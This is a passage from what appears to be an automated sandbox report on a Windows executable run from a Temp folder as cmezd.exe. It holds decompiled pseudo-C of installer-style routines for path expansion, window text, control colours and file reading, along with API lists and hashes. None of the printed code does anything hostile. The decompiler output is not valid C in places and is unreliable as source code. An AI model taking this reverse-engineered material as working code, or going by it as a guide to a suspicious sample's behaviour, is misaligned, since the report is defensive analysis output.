					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                              0x004066a5
                                                                                              0x004066a5
                                                                                              0x004066a5
                                                                                              0x004066ab
                                                                                              0x004066b0
                                                                                              0x004066c1
                                                                                              0x004066c1
                                                                                              0x004066c9
                                                                                              0x004066ca
                                                                                              0x004066cb
                                                                                              0x004066cc
                                                                                              0x004066cf
                                                                                              0x004066d7
                                                                                              0x004066d9
                                                                                              0x004066ea
                                                                                              0x004066ed
                                                                                              0x004066ed
                                                                                              0x004066f1
                                                                                              0x004066f7
                                                                                              0x004066fa
                                                                                              0x004068d5
                                                                                              0x004068d5
                                                                                              0x004068e0
                                                                                              0x004068ec
                                                                                              0x004068ec
                                                                                              0x00000000
                                                                                              0x00406700
                                                                                              0x00406705
                                                                                              0x0040671a
                                                                                              0x0040671b
                                                                                              0x00406721
                                                                                              0x004068b3
                                                                                              0x004068c1
                                                                                              0x004068c4
                                                                                              0x004068c4
                                                                                              0x004068b5
                                                                                              0x004068b8
                                                                                              0x004068bb
                                                                                              0x004068bd
                                                                                              0x004068bd
                                                                                              0x004068c6
                                                                                              0x004068c6
                                                                                              0x004068cc
                                                                                              0x004068cf
                                                                                              0x00406702
                                                                                              0x00000000
                                                                                              0x00406702
                                                                                              0x00000000
                                                                                              0x004068cf
                                                                                              0x00406727
                                                                                              0x0040672a
                                                                                              0x00406739
                                                                                              0x00406740
                                                                                              0x0040674c
                                                                                              0x0040674f
                                                                                              0x00406752
                                                                                              0x00406753
                                                                                              0x00406758
                                                                                              0x0040675e
                                                                                              0x00406761
                                                                                              0x00406764
                                                                                              0x00406857
                                                                                              0x0040685c
                                                                                              0x0040688f
                                                                                              0x00406894
                                                                                              0x00406899
                                                                                              0x0040689e
                                                                                              0x0040689e
                                                                                              0x004068a3
                                                                                              0x004068a9
                                                                                              0x004068ac
                                                                                              0x00000000
                                                                                              0x004068ac
                                                                                              0x0040685e
                                                                                              0x00406861
                                                                                              0x00406864
                                                                                              0x00406879
                                                                                              0x00406880
                                                                                              0x00406866
                                                                                              0x0040686d
                                                                                              0x0040686d
                                                                                              0x00406888
                                                                                              0x0040688b
                                                                                              0x0040684f
                                                                                              0x00406850
                                                                                              0x00406850
                                                                                              0x00000000
                                                                                              0x0040688b
                                                                                              0x00406771
                                                                                              0x00406775
                                                                                              0x00406775
                                                                                              0x00406776
                                                                                              0x00406778
                                                                                              0x004067b5
                                                                                              0x004067b8
                                                                                              0x004067c8
                                                                                              0x004067cb
                                                                                              0x004067d3
                                                                                              0x004067d9
                                                                                              0x004067d9
                                                                                              0x00406834
                                                                                              0x00406834
                                                                                              0x00406836
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067dd
                                                                                              0x004067e2
                                                                                              0x004067e3
                                                                                              0x004067e5
                                                                                              0x004067fc
                                                                                              0x0040680a
                                                                                              0x00406810
                                                                                              0x00406812
                                                                                              0x00406830
                                                                                              0x00406830
                                                                                              0x00406830
                                                                                              0x00000000
                                                                                              0x00406830
                                                                                              0x00406818
                                                                                              0x00406821
                                                                                              0x00406824
                                                                                              0x0040682a
                                                                                              0x0040682e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040682e
                                                                                              0x004067f6
                                                                                              0x004067f8
                                                                                              0x004067fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067fa
                                                                                              0x00000000
                                                                                              0x00406834
                                                                                              0x004067c0
                                                                                              0x00000000
                                                                                              0x0040677a
                                                                                              0x00406798
                                                                                              0x004067a1
                                                                                              0x0040683e
                                                                                              0x00406842
                                                                                              0x0040684a
                                                                                              0x0040684a
                                                                                              0x00000000
                                                                                              0x00406842
                                                                                              0x004067ab
                                                                                              0x00406838
                                                                                              0x0040683c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040683c
                                                                                              0x00406778
                                                                                              0x00000000
                                                                                              0x00406705

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000400), ref: 004067C0
                                                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                              • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 4260037668-1004319777
                                                                                              • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                              • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                              • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                              • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                              0x004056d0
                                                                                              0x004056da
                                                                                              0x004056df
                                                                                              0x004056e5
                                                                                              0x004056f0
                                                                                              0x004056f3
                                                                                              0x004056f6
                                                                                              0x004056fc
                                                                                              0x004056fc
                                                                                              0x00405702
                                                                                              0x0040570a
                                                                                              0x0040570d
                                                                                              0x0040572a
                                                                                              0x0040572e
                                                                                              0x00405737
                                                                                              0x00405737
                                                                                              0x00405741
                                                                                              0x0040574a
                                                                                              0x00405756
                                                                                              0x0040575d
                                                                                              0x00405761
                                                                                              0x00405764
                                                                                              0x00405777
                                                                                              0x00405785
                                                                                              0x00405785
                                                                                              0x00405789
                                                                                              0x0040578b
                                                                                              0x0040578e
                                                                                              0x00000000
                                                                                              0x0040578e
                                                                                              0x0040570f
                                                                                              0x00405717
                                                                                              0x0040571f
                                                                                              0x00405725
                                                                                              0x00000000
                                                                                              0x00405725
                                                                                              0x0040571f
                                                                                              0x0040570d
                                                                                              0x0040579a

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                              • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                              • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                              • String ID: ('B
                                                                                              • API String ID: 1495540970-2332581011
                                                                                              • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                              • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                              • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                              • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                              0x0040463d
                                                                                              0x004046f3
                                                                                              0x00000000
                                                                                              0x004046f3
                                                                                              0x0040464e
                                                                                              0x00404652
                                                                                              0x00000000
                                                                                              0x0040466c
                                                                                              0x0040466c
                                                                                              0x00404675
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404677
                                                                                              0x00404683
                                                                                              0x00404686
                                                                                              0x00404686
                                                                                              0x0040468c
                                                                                              0x00404692
                                                                                              0x00404692
                                                                                              0x0040469e
                                                                                              0x004046a4
                                                                                              0x004046ab
                                                                                              0x004046ae
                                                                                              0x004046b1
                                                                                              0x004046b3
                                                                                              0x004046b3
                                                                                              0x004046bb
                                                                                              0x004046c1
                                                                                              0x004046c1
                                                                                              0x004046cb
                                                                                              0x004046d0
                                                                                              0x004046d3
                                                                                              0x004046d8
                                                                                              0x004046db
                                                                                              0x004046db
                                                                                              0x004046eb
                                                                                              0x004046eb
                                                                                              0x00000000
                                                                                              0x004046ee

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                              • GetSysColor.USER32(00000000), ref: 00404686
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                              • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                              • GetSysColor.USER32(?), ref: 004046B1
                                                                                              • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                              • DeleteObject.GDI32(?), ref: 004046DB
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                              0x004026ec
                                                                                              0x004026ee
                                                                                              0x004026f1
                                                                                              0x004026f3
                                                                                              0x004026f6
                                                                                              0x004026fb
                                                                                              0x004026ff
                                                                                              0x00402702
                                                                                              0x00402705
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x0040270b
                                                                                              0x0040270b
                                                                                              0x00402712
                                                                                              0x00402714
                                                                                              0x00402714
                                                                                              0x0040271a
                                                                                              0x0040287e
                                                                                              0x0040287e
                                                                                              0x00402881
                                                                                              0x00402886
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00000000
                                                                                              0x00402720
                                                                                              0x00402721
                                                                                              0x0040272c
                                                                                              0x0040272f
                                                                                              0x0040273b
                                                                                              0x0040273f
                                                                                              0x004027d7
                                                                                              0x004027ef
                                                                                              0x004027ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402745
                                                                                              0x00402745
                                                                                              0x00402748
                                                                                              0x00402749
                                                                                              0x0040274c
                                                                                              0x00402751
                                                                                              0x00402758
                                                                                              0x00402760
                                                                                              0x00000000
                                                                                              0x00402766
                                                                                              0x00402766
                                                                                              0x0040276b
                                                                                              0x00000000
                                                                                              0x00402771
                                                                                              0x00402771
                                                                                              0x00402779
                                                                                              0x0040277c
                                                                                              0x0040277f
                                                                                              0x0040283a
                                                                                              0x00402841
                                                                                              0x00402785
                                                                                              0x0040278b
                                                                                              0x00402797
                                                                                              0x00402801
                                                                                              0x00402801
                                                                                              0x00402799
                                                                                              0x00402799
                                                                                              0x0040279c
                                                                                              0x0040279e
                                                                                              0x0040279e
                                                                                              0x0040279e
                                                                                              0x004027a1
                                                                                              0x004027a6
                                                                                              0x004027a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004027ab
                                                                                              0x004027ae
                                                                                              0x004027bc
                                                                                              0x004027c2
                                                                                              0x004027d0
                                                                                              0x00000000
                                                                                              0x004027d2
                                                                                              0x00000000
                                                                                              0x004027d2
                                                                                              0x00000000
                                                                                              0x004027d0
                                                                                              0x0040279e
                                                                                              0x00402804
                                                                                              0x00402807
                                                                                              0x00000000
                                                                                              0x00402809
                                                                                              0x0040280e
                                                                                              0x0040284f
                                                                                              0x00402871
                                                                                              0x00402878
                                                                                              0x0040285d
                                                                                              0x0040285d
                                                                                              0x00402860
                                                                                              0x00402863
                                                                                              0x00402866
                                                                                              0x00402866
                                                                                              0x00000000
                                                                                              0x00402817
                                                                                              0x00402817
                                                                                              0x0040281a
                                                                                              0x0040281d
                                                                                              0x00402823
                                                                                              0x00402827
                                                                                              0x0040282a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040282a
                                                                                              0x0040280e
                                                                                              0x00402807
                                                                                              0x0040277f
                                                                                              0x0040276b
                                                                                              0x00402760
                                                                                              0x00000000
                                                                                              0x0040282c
                                                                                              0x0040282c
                                                                                              0x0040282f
                                                                                              0x00402838
                                                                                              0x00000000
                                                                                              0x0040272f
                                                                                              0x0040271a
                                                                                              0x00402c33
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
